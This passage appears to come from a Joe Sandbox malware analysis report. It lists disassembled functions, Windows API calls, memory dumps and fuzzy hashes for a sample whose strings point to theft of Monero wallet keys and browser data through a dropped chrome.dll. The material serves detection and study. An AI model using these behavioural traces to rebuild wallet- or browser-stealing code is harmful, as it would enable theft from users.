                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: ec977e48bd2cc4d6ddc3a50bc68548063d4dc89ec304819dced223ee4d685748
                              • Instruction ID: 30932579e06a2e2c41e680cddbea0a2749a5bfbb354e585b5f9c08c70db4a979
                              • Opcode Fuzzy Hash: ec977e48bd2cc4d6ddc3a50bc68548063d4dc89ec304819dced223ee4d685748
                              • Instruction Fuzzy Hash: A54189B69001186BDF14EBE4EC86FEE733DFB98700F004958B7159A181EE7556C98BE2
                              Function 0088CBE2 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: dllmain_raw$dllmain_crt_dispatch
                              • String ID:
                              • API String ID: 3136044242-0
                              • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                              • Instruction ID: 8901e0f5c95e9d4d9dcf319e8bc3c055b2073c42df16aaa5c1227bb8d79d24c0
                              • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                              • Instruction Fuzzy Hash: CA219072D40619AFDB31BF59CD4196F3A7AFB81BA4F054119F909E721AD3308D418BB1
                              Function 00827F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00827FC7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00827FCE
                              • RegOpenKeyExA.ADVAPI32(80000002,015EBB98,00000000,00020119,?), ref: 00827FEE
                              • RegQueryValueExA.ADVAPI32(?,015FD1D8,00000000,00000000,000000FF,000000FF), ref: 0082800F
                              • RegCloseKey.ADVAPI32(?), ref: 00828022
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 924c93fd590918e048e1925f6d47b09261cd50f539e4a0fbb955708078299955
                              • Instruction ID: dbebea748d98d7f0b99f797036c3e2a9f1f4e48166cb02e42f7b35fa934d15c0
                              • Opcode Fuzzy Hash: 924c93fd590918e048e1925f6d47b09261cd50f539e4a0fbb955708078299955
                              • Instruction Fuzzy Hash: F7118FB1A44359EBDB00CBC4ED85FAFBB78FB04B10F104219F615EB290D77558018BA1
                              Function 008293F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrStrA.SHLWAPI(015FDE18,00000000,00000000,?,00819F71,00000000,015FDE18,00000000), ref: 008293FC
                              • lstrcpyn.KERNEL32(00AE7580,015FDE18,015FDE18,?,00819F71,00000000,015FDE18), ref: 00829420
                              • lstrlen.KERNEL32(00000000,?,00819F71,00000000,015FDE18), ref: 00829437
                              • wsprintfA.USER32 ref: 00829457
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: c29223b40fef755dfb8e9aad6b61646cde130cb60b943a36f657c327853a8f41
                              • Instruction ID: 80b199a3a3874d640f89dd9c7b40d9faa0d2a81326f1a4d421dfcf83d19044ab
                              • Opcode Fuzzy Hash: c29223b40fef755dfb8e9aad6b61646cde130cb60b943a36f657c327853a8f41
                              • Instruction Fuzzy Hash: 50011A76504248FFDB04DFA8D998EAE7B78FB48304F108258F9099B204D731AA41DBA0
                              Function 008112A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008112B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008112BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 008112D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008112F5
                              • RegCloseKey.ADVAPI32(?), ref: 008112FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: d067b51677965df8960dc3ad43299bb9cb084486bc9abb50c60410ab389b91b3
                              • Instruction ID: 56d53d873c97fe85f0184d4cd9dc7fc7739595b5bb3c2f03d1331436a2c1ad66
                              • Opcode Fuzzy Hash: d067b51677965df8960dc3ad43299bb9cb084486bc9abb50c60410ab389b91b3
                              • Instruction Fuzzy Hash: 9E01CD79A44309BBDB04DFD4DC89FAE7778EB48701F104199FB059B290DA709A418B90
                              Function 0082CB7E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: c310a4f7ee2afc2721bdf536d9b8b2c7134560e4882eef918663c9ef3393f7db
                              • Instruction ID: bad1618b75dc3cc26016dbe2f5314f9fc1e3e7dfc9fd91f778aaf9f055d622ec
                              • Opcode Fuzzy Hash: c310a4f7ee2afc2721bdf536d9b8b2c7134560e4882eef918663c9ef3393f7db
                              • Instruction Fuzzy Hash: 2C41D7B05047AC9EDB218B289D85FFF7BE8FB45704F1444E8E98AD6182D2719A84DF60
                              Function 008268D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00826903
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                              • ShellExecuteEx.SHELL32(0000003C), ref: 008269C6
                              • ExitProcess.KERNEL32 ref: 008269F5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: 78a0164b0d5e1f05de9634144136650c3b9e449899b2ad6f318c1314c39d401f
                              • Instruction ID: 1e83858482dcf6e6bcc0c20e569dcc422bbd2b357f55dd8c64e73706e5124356
                              • Opcode Fuzzy Hash: 78a0164b0d5e1f05de9634144136650c3b9e449899b2ad6f318c1314c39d401f
                              • Instruction Fuzzy Hash: 2F314FB1901228ABDB18EB94ED92FDDB778FF04310F804589F205A6191DF706B89CF56
                              Function 00828950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00830E10,00000000,?), ref: 008289BF
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008289C6
                              • wsprintfA.USER32 ref: 008289E0
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: 820906f956f6dabe03f9458813b8fff8dfe7027eba2450f472f2588cc020e3af
                              • Instruction ID: 5790a3d0650aad1897e950fba23fe5dc9af8688d9a0b883da82c922ca24f677b
                              • Opcode Fuzzy Hash: 820906f956f6dabe03f9458813b8fff8dfe7027eba2450f472f2588cc020e3af
                              • Instruction Fuzzy Hash: 3D2190B1A04244AFDB00DFD4DC85FAEBBB8FB48701F104119F615AB280CB7559018BA0
                              Function 0081A090 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0081A098
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                              • API String ID: 1029625771-1545816527
                              • Opcode ID: b82a7bd8c5cd60ec9027d74c01addc8fba2777b8b1e1eb9862e53a81c58b2c39
                              • Instruction ID: a9addadfc01f3df59c7d54d5080ad059a779c1f02e51f7f85c5f9a2c30aa475a
                              • Opcode Fuzzy Hash: b82a7bd8c5cd60ec9027d74c01addc8fba2777b8b1e1eb9862e53a81c58b2c39
                              • Instruction Fuzzy Hash: BEF01DB064D284AFD705EBA4EDCCB9A37A8F745704F100424E516DF2A0D2B858C6CB52
                              Function 00828EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,008296AE,00000000), ref: 00828EEB
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00828EF2
                              • wsprintfW.USER32 ref: 00828F08
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 9a85c0916c723fedd1e758e88ad909fbb7d0369234e4644d4d5852985bcfaa8f
                              • Instruction ID: e0882ad1549e774044a3604f6fc50095049f4f52faa66c22dbe1f41368133011
                              • Opcode Fuzzy Hash: 9a85c0916c723fedd1e758e88ad909fbb7d0369234e4644d4d5852985bcfaa8f
                              • Instruction Fuzzy Hash: 61E08C70A48308BBDB00CBD4DD4AEAD77B8EB04302F000194FE09CB340DA719E018B91
                              Function 0081A990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                                • Part of subcall function 00828CF0: GetSystemTime.KERNEL32(00830E1B,015FA008,008305B6,?,?,008113F9,?,0000001A,00830E1B,00000000,?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 00828D16
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0081AA11
                              • lstrlen.KERNEL32(00000000,00000000), ref: 0081AB2F
                              • lstrlen.KERNEL32(00000000), ref: 0081ADEC
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                              • DeleteFileA.KERNEL32(00000000), ref: 0081AE73
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
